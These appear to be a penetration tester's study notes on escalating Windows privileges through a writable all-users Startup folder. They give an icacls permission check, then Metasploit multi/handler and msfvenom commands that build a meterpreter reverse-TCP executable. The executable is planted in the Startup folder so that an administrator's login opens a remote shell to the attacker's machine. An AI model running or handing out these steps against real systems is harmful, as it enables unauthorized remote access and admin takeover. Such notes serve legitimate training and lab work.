Startup Applications

This is something PowerUp misses!!

So niche, probably won’t see, but nice to know in case it’s literally the only path

we use icacls (eye cackles)

windows CMD:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

We try to find the user group with full access ‘(F)’ to a directory

Exploitation:

Make y.exe and set up meterpreter listener again:

In Kali:

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
run

In another Terminal:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 -f exe -o y.exe

Move the file to Windows in Startup folder:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

If you can’t see ProgramData, just type it in the address bar

Logoff

Login with admin account creds

In Kali:

find the meterpreter session created and type:

getuid

It should be the admin